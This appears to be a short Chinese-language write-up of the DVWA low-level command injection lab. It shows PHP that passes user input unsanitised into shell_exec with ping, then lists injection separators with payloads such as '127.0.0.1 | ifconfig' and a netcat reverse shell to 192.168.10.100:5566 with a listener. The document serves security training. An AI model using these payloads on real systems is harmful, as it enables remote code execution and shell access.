Low
源码
<?php
if( isset( $_POST[ 'Submit' ] ) ) { $target = $_REQUEST[ 'ip' ];
if( stristr( php_uname( 's' ), 'Windows NT' ) ) { $cmd = shell_exec( 'ping ' . $target ); } else { $cmd = shell_exec( 'ping -c 4 ' . $target ); }
echo "<pre>{$cmd}</pre>"; }
?>
|
解题
尝试使用反弹命令,使得CMD将权限反弹出来。但是这不是pikachu靶场,无法实现ncat反弹shell的命令(docker环境的不完整性),能执行的仅仅是实现简单的恶意语句执行。
注意: 1.这个环境实现的是Ping操作,所以说输入IP地址相当于使用了 'ping IP地址'的操作 2.使用Ifconfig还是Ipconfig取决于当前系统环境
连接字符 | || & &&
无论是否为true/false,优先执行后面的语句 127.0.0.1 | ifconfig
无论是否为true/false,ping ip的操作和ifconfig的操作都将被执行一遍. 127.0.0.1 & ifconfig
当ping IP执行为false时,执行后面的ifconfig 127.0.0.1 || ifconfig 127.0.0.1 && ifconfig
|

127.0.0.1|nc -e /bin/bash 192.168.10.100 5566
nc -lvvp 5566 下面是最明显的回显
|
